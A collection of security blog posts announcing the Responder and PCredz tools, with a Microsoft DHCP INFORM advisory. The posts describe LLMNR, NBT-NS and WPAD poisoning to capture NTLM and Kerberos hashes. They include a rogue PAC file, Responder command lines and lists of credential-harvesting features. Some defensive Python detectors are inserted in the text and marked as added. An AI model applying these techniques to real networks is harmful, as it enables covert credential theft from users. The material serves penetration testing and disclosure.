Sunday, September 11, 2016

Introducing Proxy Auth on Responder 2.3.2

A few days ago mubix submitted a feature request on the Responder repository.
I liked the idea and started working on it. The concept was to force authentication while a victim uses the WPAD proxy server, but then comes the question: why would you authenticate someone on the proxy when you already used the -F option to force authentication for the wpad.dat file retrieval?

Why not let anyone get that wpad.dat configuration file for free, with no authentication, and then use another proxy server (not the WPAD server) to force authentication, so that Responder doesn't send an HTTP 401 response but a 407 Proxy Authentication Required, and then ditches the connection.

Thanks to PAC files, you can set fail-over proxy servers:

function FindProxyForURL(url, host)
{
    if ((host == "localhost") || shExpMatch(host, "localhost.*") || (host == "127.0.0.1") || isPlainHostName(host))
        return "DIRECT";

    if (dnsDomainIs(host, "RespProxySrv") || shExpMatch(host, "(*.RespProxySrv|RespProxySrv)"))
        return "DIRECT";

    return 'PROXY 10.10.100.10:3128; PROXY 10.10.100.20:3141; DIRECT';
}

The last line means: if the proxy server 10.10.100.10:3128 fails, use 10.10.100.20:3141; if both fail, use a direct connection to the intranet or internet.

Using this functionality, we make sure the WPAD proxy server itself is not running (by not using the -w option); any workstation using our PAC file will then:
  • Connect to 10.10.100.10:3128 and send a request with the URL, cookies and headers.
  • The Auth-Proxy module will respond with a 407 and request credentials.
  • The workstation will transparently send its encrypted NTLMv1/NTLMv2 credentials and will get a TCP Reset from the proxy server right after that.
  • This is done by using SO_LINGER, which sends a RST as soon as close() is called, faking a proxy server failure.
  • The workstation will then attempt the second proxy server, 10.10.100.20:3141, which is offline.
  • Finally the workstation will connect to the internet directly.

The user behind the desk, using Internet Explorer, has seen nothing and still has internet access; we get his NTLM credentials.
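As an added example (not code from the post or from Responder), the following Python audits a wpad.dat for exactly the fail-over shape described above: it extracts every proxy chain a PAC can return and flags chains whose first hop is not an approved proxy and that end in DIRECT, since a browser hands its request (and any proxy credentials) to that unknown hop and then quietly goes direct. The sample PAC and the approved proxy name are constructed for the example.

```python
import re

# Constructed sample: the fail-over wpad.dat from the post, trimmed to its essentials.
SAMPLE_PAC = '''
function FindProxyForURL(url, host)
{
    if (isPlainHostName(host))
        return "DIRECT";
    return 'PROXY 10.10.100.10:3128; PROXY 10.10.100.20:3141; DIRECT';
}
'''

# Every string literal handed to a return statement inside the PAC.
RETURN_RE = re.compile(r'return\s*([\'"])(.*?)\1\s*;', re.S)

def parse_proxy_chain(value: str) -> list:
    """Split a PAC return value ("PROXY a:b; SOCKS c:d; DIRECT") into the ordered
    fail-over chain of (kind, host:port) pairs the browser will try, in order."""
    chain = []
    for entry in (e.strip() for e in value.split(';')):
        if not entry:
            continue
        parts = entry.split(None, 1)
        kind = parts[0].upper()
        if kind == 'DIRECT':
            chain.append(('DIRECT', None))
        elif kind in ('PROXY', 'HTTP', 'HTTPS', 'SOCKS', 'SOCKS4', 'SOCKS5') and len(parts) == 2:
            chain.append((kind, parts[1].strip()))
        else:
            raise ValueError(f'unrecognised PAC proxy entry: {entry!r}')
    return chain

def audit_pac(pac_text: str, approved: set) -> dict:
    """List every proxy the PAC can route a browser through, the ones not in the
    approved set, and chains whose first hop is unapproved and that fall through to
    DIRECT: that is the shape the post describes, where the unknown hop sees the
    request (and proxy auth) and a reset sends the user straight out."""
    chains = [parse_proxy_chain(m.group(2)) for m in RETURN_RE.finditer(pac_text)]
    proxies = {hp for chain in chains for _kind, hp in chain if hp}
    suspicious = [chain for chain in chains
                  if chain and chain[0][1] and chain[0][1] not in approved
                  and chain[-1][0] == 'DIRECT']
    return {'proxies': sorted(proxies),
            'unapproved': sorted(proxies - approved),
            'unapproved_then_direct': suspicious}

if __name__ == '__main__':
    print(audit_pac(SAMPLE_PAC, approved={'proxy.corp.example:8080'}))
```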

This attack is highly effective and is included in the latest version 2.3.2:

https://github.com/lgandx/Responder/

This video demonstrates the concept on a 2012R2 PDC with default settings: someone simply opens IE and Responder gets the credentials transparently, with no password prompt:


Wednesday, September 30, 2015

Demystifying Responder's WPAD Authentication module

One of the most successful modules in Responder is the WPAD server.

The WPAD functionality boils down to two issues:
  • WPAD MITM: anyone on an ISP (like qc.ca) plugged directly into the modem (WAN), and therefore on the internet, is vulnerable if someone creates a wpad.qc.ca domain and serves a wpad.dat file to the people looking for it.
  The Web Proxy Autodiscovery Protocol looks for WPAD.domain.name by default; if there's no answer it falls back to multicast LLMNR, and if that fails it goes to broadcast NBT-NS.
  • WPAD file retrieval: Responder exploits the fact that the Web Proxy Autodiscovery Protocol allows and supports HTTP authentication. Therefore, if a workstation is looking for "WPAD" via LLMNR or NBT-NS and someone answers it (multicast/broadcast) with a rogue HTTP authentication server, that workstation will transparently send its sets of credentials.
If a workstation boots up, the machine credentials will be sent. If a user opens IE on that workstation, Responder gets the encrypted sets of credentials transparently, with obviously no user interaction and no logs. Therefore, no logs, no crime, right?
What I just described is the stealthiest way of exploiting and getting encrypted sets of credentials on any workstation from Windows 2000 to 2012R2.
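An added detection example, not part of the original post: it decodes the name carried in raw LLMNR and NBT-NS query payloads (including the NBT-NS first-level name encoding) and reports hosts asking the local segment for WPAD, which is the moment DNS has given no answer and any listener can reply. The packets and addresses are constructed for the example.

```python
import struct

def build_llmnr_query(name: str, txid: int = 0x1234) -> bytes:
    """Constructed LLMNR A query (RFC 4795 reuses the DNS message layout)."""
    header = struct.pack('!HHHHHH', txid, 0, 1, 0, 0, 0)     # id, flags, qd/an/ns/ar counts
    qname = b''.join(bytes([len(l)]) + l.encode() for l in name.split('.')) + b'\x00'
    return header + qname + struct.pack('!HH', 1, 1)          # QTYPE A, QCLASS IN

def build_nbns_query(name: str, suffix: int = 0x00, txid: int = 0x5678) -> bytes:
    """Constructed NBT-NS name query: the NetBIOS name is space-padded to 15 bytes
    plus a suffix byte (0x00 = workstation service), then first-level encoded,
    i.e. each nibble becomes one letter starting at 'A'."""
    header = struct.pack('!HHHHHH', txid, 0x0110, 1, 0, 0, 0) # flags: recursion + broadcast
    raw = name.upper().encode().ljust(15, b' ') + bytes([suffix])
    enc = ''.join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0xF)) for b in raw)
    return header + bytes([32]) + enc.encode() + b'\x00' + struct.pack('!HH', 0x20, 1)  # NB, IN

def query_name(payload: bytes, dst_port: int) -> str:
    """Extract the queried name from a raw LLMNR (UDP 5355) or NBT-NS (UDP 137) payload."""
    pos, labels = 12, []
    while payload[pos]:                                       # walk the length-prefixed labels
        length = payload[pos]
        labels.append(payload[pos + 1:pos + 1 + length])
        pos += 1 + length
    if dst_port == 137:
        enc = labels[0]                                       # one 32-char first-level label
        raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
        return raw[:15].decode('ascii').rstrip()              # drop padding and the suffix byte
    return '.'.join(l.decode('ascii') for l in labels)

def wpad_fallback_alerts(events: list) -> list:
    """events: (src_ip, dst_port, payload) tuples as a capture sensor would hand over.
    A WPAD lookup that reaches LLMNR or NBT-NS means DNS gave no answer for
    wpad.<domain> and any host on the segment can now answer it."""
    alerts = []
    for src, port, payload in events:
        if port in (137, 5355) and query_name(payload, port).upper() == 'WPAD':
            alerts.append((src, 'NBT-NS' if port == 137 else 'LLMNR'))
    return alerts

if __name__ == '__main__':
    sample = [('10.0.0.5', 5355, build_llmnr_query('wpad')),     # constructed traffic
              ('10.0.0.5', 137, build_nbns_query('WPAD')),
              ('10.0.0.9', 5355, build_llmnr_query('fileserver'))]
    print(wpad_fallback_alerts(sample))
```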

Monday, June 9, 2014

Responder v2.0.9

Responder is an Active Directory/Windows environment takeover tool suite that can stealthily take over any default Active Directory environment (including Windows 2012) in minutes or hours. Most of the attacks in this tool are hard to detect and are highly successful.

Responder attacks 5 Windows core protocols:
 - LLMNR poisoning (Windows >= Vista).
 - NetBIOS Name Service poisoning (NBT-NS poisoning, any Windows by default).
 - WPAD (any by default).
 - ICMP Redirect (Windows <= 2003/XP).
 - DHCP INFORM (Windows <= 2003/XP) and the ability to perform normal DHCP attacks (Linux, OSX, Windows) [unicast answer].

An extra protocol has been added for OSX and Linux distributions using avahi: MDNS (Linux, Apple, any .local).

When exploiting these protocol flaws, Responder has its own rogue servers listening:
- SMB Auth server. Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. This functionality is enabled by default when the tool is launched.

- MSSQL Auth server. In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup use the Workstation Service name suffix) for systems older than Windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1 and LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.

- HTTP Auth server. In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can also send your custom files to a victim.

- HTTPS Auth server. In order to redirect HTTPS Authentication to this tool, you will need to set the -r option for Windows versions older than Vista (NBT-NS queries for HTTP server lookups are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2, and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari. The folder Cert/ was added. It contains 2 default keys, including a dummy private key. This is intentional. The purpose is to have Responder working out of the box. A script was added in case you need to generate your own self-signed key pair.

- LDAP Auth server. In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.

- FTP Auth server. This module will collect FTP clear text credentials.

- Kerberos v5 pre-auth server.

- Small DNS server. This server will answer type A queries. This is really handy when it's combined with ARP spoofing, ICMP Redirect, DHCP INFORM.

- WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is highly effective. You can send your custom PAC script to a victim and inject HTML into the server's responses. See Responder.conf.

- Analyze mode: This module allows you to see NBT-NS, BROWSER and LLMNR requests between systems without poisoning any requests. You can also map domains, MSSQL servers, workstations passively and also see if ICMP Redirects attacks are plausible on your subnet. No port scans.

- POP3 auth server. This module will collect POP3 plaintext credentials.

- SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials.

- IMAP auth server.

Responder also lets you:

- Customize your penetration test via Responder.conf.
- Respond to specific in-scope NetBIOS/LLMNR names.
- Respond to specific in-scope IP addresses.
- Inject SMB share pictures into WPAD responses.
- Replace requested .exe files with your own, shown as the original one requested.
- Replace any requested page with your custom HTML page, exe file, etc. (S-E).
- Set your custom NETNTLM challenge.

In addition, Responder:
- Logs all its activity to a file: Responder-Session.log.
- Prints all hashes to stdout and dumps them into a unique hashcat-compliant file named (SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt in the current folder.
- Fingerprints every host that issued an LLMNR/NBT-NS query when the -f option is set. All capture modules still work while in fingerprint mode.

Usage example:
./Responder.py -i Your_IP_Address -rvF
Use NBT-NS workstation redirects, be verbose, force WPAD file retrieval authentication.

./Responder.py -i Your_IP_Address -A
Analyze mode shows NBT-NS/LLMNR/MDNS queries without responding, finds all MSSQL servers, workstations and domains, and prints whether you can ICMP-redirect on the subnet. Passive reconnaissance at its best: no port scan, map a network within minutes.

Github:
https://github.com/Spiderlabs/Responder

More info:
- https://github.com/SpiderLabs/Responder/blob/master/README.md
- http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
- http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
- http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html
- http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html

Twitter:
- https://twitter.com/PythonResponder

Saturday, June 7, 2014

More on PCredz

PCredz was designed to dump useful information on the fly, from a pcap file or from a pcap directory.
Unlike tools such as Breachprobe, PCredz is highly effective and fast, built to meet your pentest needs.

What PCredz does right now from a live interface or pcap file:
  • Identify Card Holder Data (CHD) on any port.
  • Dump NTLMv1/v2 (DCE-RPC, SMBv1/2, LDAP, MSSQL, HTTP, etc.) hashes on any protocol and port.
  • Dump Kerberos (AS-REQ Pre-Auth etype 23) hashes (TCP/UDP 88).
  • Dump HTTP Basic credentials (any port).
  • Dump POP credentials.
  • Dump SMTP credentials.
  • Dump IMAP credentials.
  • Dump SNMP community strings.
  • Dump FTP credentials.
All hashes are displayed in hashcat format (use -m 7500 for Kerberos, -m 5500 for NTLMv1, -m 5600 for NTLMv2).
All credentials are logged to a file (CredentialDump-Session.log).

PCredz was designed to be highly efficient, specifically for use alongside ARP poisoning attacks.
More details and download link:
Github: https://github.com/lgandx/PCredz/

Wednesday, May 28, 2014

Microsoft DHCP INFORM Configuration Overwrite

Title:           Microsoft DHCP INFORM Configuration Overwrite
Version:         1.0
Issue type:      Protocol Security Flaw
Affected vendor: Microsoft
Release date:    28/05/2014
Discovered by:   Laurent Gaffié
Advisory by:     Laurent Gaffié
Issue status:    Patch not available
=================================================

Summary
-------

A vulnerability in Windows DHCP (http://www.ietf.org/rfc/rfc2131.txt) was found on Windows OS versions
ranging from Windows 2000 through Windows Server 2003. This vulnerability allows an attacker to remotely
overwrite DNS, gateway, IP address, routing, WINS server, WPAD, and server configuration with no user
interaction. Successful exploitation of this issue results in a remote network configuration
overwrite. Microsoft acknowledged the issue but has indicated no plans to publish a patch to resolve it.


Technical details
-----------------

Windows 2003/XP machines send periodic DHCP INFORM requests and do not check whether the DHCP INFORM answer (DHCP ACK) comes from the registered DHCP server/relay server. Any local system may respond to these requests and overwrite a Windows 2003/XP network configuration by sending a properly formatted unicast reply.
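As an added example, not code from the advisory or from Responder, this Python performs the check the text says XP/2003 clients skip: it parses a DHCPACK's options and rejects the reply unless both its source address and its Server Identifier (option 54) belong to the registered DHCP server, listing which settings a rogue reply would have overwritten. The packets, addresses and trusted-server set are constructed for the example.

```python
import struct
import ipaddress

MAGIC = b'\x63\x82\x53\x63'   # DHCP magic cookie that precedes the options field

def build_dhcp_ack(server_ip: str, client_ip: str, options: dict) -> bytes:
    """Constructed DHCPACK in the RFC 2131 fixed layout (236 bytes) + cookie + options.
    ciaddr carries the client's address, as in a reply to DHCPINFORM."""
    fixed = struct.pack('!BBBBIHH4s4s4s4s16s64s128s', 2, 1, 6, 0, 0x3d1d, 0, 0,
                        ipaddress.ip_address(client_ip).packed, b'\0' * 4,
                        ipaddress.ip_address(server_ip).packed, b'\0' * 4,
                        b'\0' * 16, b'\0' * 64, b'\0' * 128)
    body = b''.join(bytes([code, len(val)]) + val for code, val in options.items())
    return fixed + MAGIC + body + b'\xff'

def parse_options(packet: bytes) -> dict:
    """Return {option_code: value_bytes}; skips PAD (0) and stops at END (255)."""
    if packet[236:240] != MAGIC:
        raise ValueError('not a DHCP packet')
    opts, pos = {}, 240
    while pos < len(packet) and packet[pos] != 255:
        if packet[pos] == 0:
            pos += 1
            continue
        code, length = packet[pos], packet[pos + 1]
        opts[code] = packet[pos + 2:pos + 2 + length]
        pos += 2 + length
    return opts

def inform_reply_findings(packet: bytes, src_ip: str, trusted: set) -> list:
    """Reasons to discard a reply to DHCPINFORM. An empty list means the ACK came
    from the registered server (by source address and by Server Identifier)."""
    opts = parse_options(packet)
    reasons = []
    if opts.get(53) != b'\x05':
        reasons.append('not a DHCPACK')
    server_id = str(ipaddress.ip_address(opts[54])) if 54 in opts else None
    if src_ip not in trusted:
        reasons.append(f'ACK from untrusted source {src_ip}')
    if server_id not in trusted:
        reasons.append(f'server identifier {server_id} is not the registered DHCP server')
    # Settings the advisory says a forged reply overwrites on XP/2003.
    touched = [name for code, name in ((6, 'DNS'), (3, 'gateway'), (44, 'WINS'),
                                       (252, 'WPAD'), (249, 'routes')) if code in opts]
    if reasons and touched:
        reasons.append('would overwrite: ' + ', '.join(touched))
    return reasons
```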

Impact
------

Successful attempts will overwrite DNS, WPAD, WINS, gateway, and/or routing settings on the target system.

Affected products
-----------------

Windows:
- 2000
- XP
- 2003

Proof of concept
----------------
The DHCP.py utility found within the Responder toolkit can be used to exploit this vulnerability.

git clone https://github.com/Spiderlabs/Responder

Solution
--------
Set the DWORD registry value "UseInform" to 0 in each subkey found under HKLM\SYSTEM\CCS\Services\TCP\Interfaces\

Response timeline
-----------------
* 18/04/2014 - Vendor notified.
* 18/04/2014 - Vendor acknowledges the advisory ([MSRC]0050886).
* 18/04/2014 - Suggested to the vendor to run Responder on an A-D environment while looking at the DHCP issue, for education purposes, since multiple attempts were
               made to make them aware that any A-D environment by default is vulnerable if Responder is running on the subnet. Also, MSRC was asked what
               code change made this DHCP INFORM issue different on Windows Vista than on Windows Server 2003.
* 21/04/2014 - MSRC answers with an automated response.
* 08/05/2014 - Request for a reply.
* 14/05/2014 - MSRC replies and refuses to share their view on the code change; however, they mention that 'The product team is investigating whether the RFC for
               a DHCPINFORM message is properly implemented'.
* 14/05/2014 - An email was sent to notify MSRC that no code change was requested, but rather the logic behind it. Also, MSRC was asked if they were successful with
               Responder.
* 16/05/2014 - MSRC closes [MSRC]0050886 and doesn't provide any info on whether they were successful with Responder in their environment.


References
----------
* Responder: https://github.com/Spiderlabs/Responder
* https://twitter.com/PythonResponder
* http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html

Wednesday, April 9, 2014

Breaking MSFT Kerberos With Responder

I've been working on a way to get MS Kerberos v5 hashes via the Browser protocol automatically with no user interaction on a given network.
(click on the pics if they don't display correctly).

Often you see these requests in wireshark on an internal penetration test:


So I came up with a tool that automates kerberos' connection for these:


Which shows up like this in Wireshark:


Here's how the attack works:
1) Poison an NBT-NS lookup for the domain controller service, wait for a SamLogonRequest, answer with a LogonSAMUserUnknownEX, then wait for a LogonPrimaryQuery and answer with a LogonSAMUserUnknownEX.
2) Set up an SMB server which responds to a NegotiateProtocolRequest with the supported mech list set to Kerberos:

and wait for the Kerberos AS-REQ on UDP 88.

Responder will then take care of the hash parsing and formatting:


And will make it ready for hashcat (-m 7500):

This will be included in the next release of Responder (https://github.com/Spiderlabs/Responder)

Game over MSKerberosV5.


Tuesday, April 8, 2014

Introducing PCredz

PCredz was built to extract credentials from large pcap files or from a live interface.

Stats on juicy pcap files:
- 30 MB pcap file: 15 s
- 500 MB pcap file: 1.5 minutes
- 2 GB pcap file: 7 minutes.

Features:

  • Extract from a pcap file or from a live interface:
    • Credit card numbers
    • POP
    • SMTP
    • IMAP
    • SNMP community string
    • FTP
    • HTTP Basic
    • NTLMv1/v2 (DCE-RPC, SMBv1/2, LDAP, MSSQL, HTTP, etc.)
    • Kerberos (AS-REQ Pre-Auth etype 23) hashes.
  • All hashes are displayed in hashcat format (use -m 7500 for Kerberos, -m 5500 for NTLMv1, -m 5600 for NTLMv2).
  • Log all credentials to a file (CredentialDump-Session.log).

Install:

  • Linux:
    On a Debian-based OS: apt-get install python-libpcap
  • OS X and other distributions:
    wget http://downloads.sourceforge.net/project/pylibpcap/pylibpcap/0.6.4/pylibpcap-0.6.4.tar.gz
    tar xvf pylibpcap-0.6.4.tar.gz
    cd pylibpcap-0.6.4
    python setup.py install

Usage:

./Pcredz -f file-to-parse.pcap
./Pcredz -d /tmp/pcap-directory-to-parse/
./Pcredz -i eth0

Options:
-h, --help          show this help message and exit
-f capture.pcap     pcap file to parse
-d /home/pnt/pcap/  pcap directory to parse recursively
-i eth0             interface for live capture
-v                  more verbose


You can download PCredz here:
https://github.com/lgandx/PCredz